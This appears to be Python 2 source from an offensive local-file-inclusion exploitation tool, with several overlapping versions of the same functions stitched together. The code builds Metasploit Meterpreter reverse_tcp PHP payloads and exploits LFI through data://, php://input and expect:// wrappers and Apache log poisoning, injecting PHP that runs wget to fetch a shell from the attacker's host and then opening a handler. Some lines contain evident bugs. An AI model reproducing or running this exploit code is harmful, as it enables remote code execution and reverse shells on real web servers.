def msf_payload(): # Arguments needed for Meterpreter lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ") lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ") # Generate random shell name g = Generator() shell = g.generate() print(t.green(" [*] ") + "Generating Data Wrapper") progressbar() print(t.red(" [!] ") + "Success!") print(t.green(" [*] ") + "Generating Metasploit Payload") progressbar() # msfpayload arguments php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format( lhost, lport, shell) # Generate shell try: msf = subprocess.Popen(php, shell=True) msf.wait() except msf.returncode as msf_error: if msf_error != 0: print(t.red(" [!] ") + "Error Generating MSF Payload ") else: print(t.red(" [!] ") + "Success! ") print(t.red(" [!] ") + "Payload Is Located At: /tmp/{0}.php").format(shell) return lhost, lport, shell
def execute_data(self): # Arguments needed for Meterpreter lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ") lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ") # Generate random shell name g = Generator() shell = g.generate() # Build payload payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost, shell) encoded_payload = payload.encode('base64') # Build data wrapper data_wrapper = "data://text/html;base64,{0}".format(encoded_payload) lfi = self.target + data_wrapper print(t.green(" [*] ") + "Generating Data Wrapper") progressbar() print(t.red(" [!] ") + "Success!") print(t.green(" [*] ") + "Generating Metasploit Payload") progressbar() # msfpayload arguments php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell) # Generate shell msf = subprocess.Popen(php, shell=True) msf.wait() # Make sure payload was generated correctly if msf.returncode != 0: print(t.red(" [!] ") + "Error Generating MSF Payload ") else: print(t.red(" [!] ") + "Success! ") print(t.red(" [!] ") + "Payload Is Located At: /tmp/{0}.php").format(shell) # Assuming if there is a server running on port 8000 hosting from /tmp print(t.red(" [!] ") + "Is Your Server Running?") print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000") print(t.green(" [*] ") + "Downloading Shell") progressbar() # LFI payload that downloads the shell data_request = requests.get(lfi) # Try block for actual attack try: if data_request.status_code != 200: print(t.red(" [!] ") + "Unexpected HTTP Response ") else: handle = Payload(lhost, lport, self.target, shell) handle.handler() except requests.exceptions.RequestException as data_error: print(t.red(" [!] ") + "HTTP Error: %s" % data_error)
def execute_logs(self): # Arguments for Meterpreter lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ") lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ") # Generate random shell name g = Generator() shell = g.generate() print(t.green(" [*] ") + "Generating Payload") progressbar() print(t.red(" [!] ") + "Success!") print(t.green(" [*] ") + "Generating Metasploit Payload") progressbar() # Generate PHP shell php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell) msf = subprocess.Popen(php, shell=True) msf.wait() # Handle Metasploit error codes if msf.returncode != 0: print(t.red(" [!] Error Generating MSF Payload ")) else: print(t.green(" [*] ") + "Success!") handle = Payload(lhost, lport, self.target, shell) handle.handler() if self.nostager: payload_file = open("/tmp/{0}.php".format(shell),"r") payload = "<?php eval(base64_decode('{0}')); ?>".format(payload_file.read().encode('base64').replace("\n","")) payload_file.close() raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...") else: payload = "<?php system('wget http://{0}:8000/{1}.php') ?>".format(lhost, shell) print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell) print(t.green(" [*] ") + "Downloading Shell") progressbar() lfi = self.target + self.location try: headers = {'User-Agent': payload} r = requests.get(lfi, headers=headers) if r.status_code != 200: print(t.red(" [!] Unexpected HTTP Response ")) else: r = requests.get(lfi) # pull down shell from poisoned logs if r.status_code != 200: print(t.red(" [!] Unexpected HTTP Response ")) except requests.exceptions.RequestException as expect_error: print t.red(" [!] HTTP Error ")(expect_error)
def execute_expect(self): # Arguments for Meterpreter lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ") lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ") # Generate random shell name g = Generator() shell = g.generate() print(t.green(" [*] ") + "Generating Payload") progressbar() print(t.red(" [!] ") + "Success!") print(t.green(" [*] ") + "Generating Metasploit Payload") progressbar() # Generate PHP shell php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell) msf = subprocess.Popen(php, shell=True) msf.wait() # Handle Metasploit error codes if msf.returncode != 0: print(t.red(" [!] Error Generating MSF Payload ")) else: print(t.green(" [*] ") + "Success!") handle = Payload(lhost, lport, self.target, shell) handle.handler() # Build payload if self.nostager: payload_file = open("/tmp/{0}.php".format(shell),"r") payload = "expect://echo \"" payload += quote_plus(payload_file.read().replace("\"","\\\"").replace("$","\\$")) payload += "\" | php" payload_file.close() raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...") else: payload = "expect://wget http://{0}:8000/{1}.php".format(lhost, shell) print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell) print(t.green(" [*] ") + "Downloading Shell") progressbar() lfi = self.target + payload try: r = requests.get(lfi) if r.status_code != 200: print(t.red(" [!] Unexpected HTTP Response ")) except requests.exceptions.RequestException as expect_error: print t.red(" [!] HTTP Error ") (expect_error)
def execute_input(self): # Arguments needed for Meterpreter lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ") lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ") # Generate random shell name g = Generator() shell = g.generate() # Build php payload wrapper = "php://input" url = self.target + wrapper payload = "<?php system('wget http://%s:8000/{0}.php'); ?>".format(shell) print(t.green(" [*] ") + "Generating Data Wrapper") progressbar() print(t.red(" [!] ") + "Success!") print t.green(" [*] ") + "Generating Metasploit Payload" progressbar() # Generate PHP shell php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell) msf = subprocess.Popen(php, shell=True) msf.wait() # Handle Metasploit error codes if msf.returncode != 0: print(t.red(" [!] Error Generating MSF Payload ")) else: print(t.green(" [*] ") + "Success!") print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell) print(t.green(" [*] ") + "Downloading Shell") progressbar() # Try block for actual attack try: dr = requests.post(url, data=payload) if dr.status_code != 200: print t.red(" [*] Unexpected HTTP Response ") else: handle = Payload(lhost, lport, self.target, shell) handle.handler() except requests.exceptions.RequestException as input_error: print t.red(" [*] HTTP Error ") + str(input_error)
def msf_payload(): """ Arguments for Meterpreter """ lhost = raw_input( t.cyan("[{0}] ".format(datetime.datetime.now())) + "Please Enter Host For Callbacks: ") lport = raw_input( t.cyan("[{0}] ".format(datetime.datetime.now())) + "Please Enter Port For Callbacks: ") """ Generate random shell name """ g = Generator() shell = g.generate() print( t.cyan("[{0}] ".format(datetime.datetime.now())) + "Generating Wrapper") progressbar() print(t.red("[{0}] ".format(datetime.datetime.now())) + "Success!") print( t.cyan("[{0}] ".format(datetime.datetime.now())) + "Generating Metasploit Payload") progressbar() """ MSF payload generation """ php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format( lhost, lport, shell) try: msf = subprocess.Popen(php, shell=True) msf.wait() if msf.returncode != 0: print( t.red("[{0}] ".format(datetime.datetime.now())) + "Error Generating MSF Payload ") sys.exit(1) else: print( t.red("[{0}] ".format(datetime.datetime.now())) + "Success! ") print( t.red("[{0}] ".format(datetime.datetime.now())) + "Payload: /tmp/{0}.php").format(shell) except OSError as os_error: print(t.red("[{0}] ".format(datetime.datetime.now()))(os_error)) return lhost, lport, shell
def execute_expect(self): # Arguments for Meterpreter lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ") lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ") # Generate random shell name g = Generator() shell = g.generate() # Build payload payload = "expect://wget http://{0}:8000/{1}.php".format(lhost, shell) lfi = self.target + payload print(t.green(" [*] ") + "Generating Payload") progressbar() print(t.red(" [!] ") + "Success!") print(t.green(" [*] ") + "Generating Metasploit Payload") progressbar() # Generate PHP shell php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell) msf = subprocess.Popen(php, shell=True) msf.wait() # Handle Metasploit error codes if msf.returncode != 0: print(t.red(" [!] Error Generating MSF Payload ")) else: print(t.green(" [*] ") + "Success!") print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell) print(t.green(" [*] ") + "Downloading Shell") progressbar() ir = requests.get(lfi) try: if ir.status_code != 200: print(t.red(" [!] Unexpected HTTP Response ")) else: handle = Payload(lhost, lport, self.target, shell) handle.handler() except requests.exceptions.RequestException as expect_error: print t.red(" [!] HTTP Error ") (expect_error)
def execute_input(self): # Arguments needed for Meterpreter lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ") lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ") # Generate random shell name g = Generator() shell = g.generate() print(t.green(" [*] ") + "Generating Data Wrapper") progressbar() print(t.red(" [!] ") + "Success!") print t.green(" [*] ") + "Generating Metasploit Payload" progressbar() # Generate PHP shell php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell) msf = subprocess.Popen(php, shell=True) msf.wait() # Handle Metasploit error codes if msf.returncode != 0: print(t.red(" [!] Error Generating MSF Payload ")) else: print(t.green(" [*] ") + "Success!") print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell) # Build php payload wrapper = "php://input" url = self.target + wrapper if self.nostager: payload_file = open("/tmp/{0}.php".format(shell),"r") payload = payload_file.read() payload_file.close() else: payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost,shell) if self.nostager: raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...") else: # Assuming if there is a server running on port 8000 hosting from /tmp print(t.red(" [!] ") + "Is Your Server Running?") print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000") print(t.green(" [*] ") + "Downloading Shell") progressbar() handle = Payload(lhost, lport, self.target, shell) handle.handler() # Try block for actual attack try: dr = requests.post(url, data=payload) if dr.status_code != 200: print t.red(" [*] Unexpected HTTP Response ") except requests.exceptions.RequestException as input_error: print t.red(" [*] HTTP Error ") + str(input_error)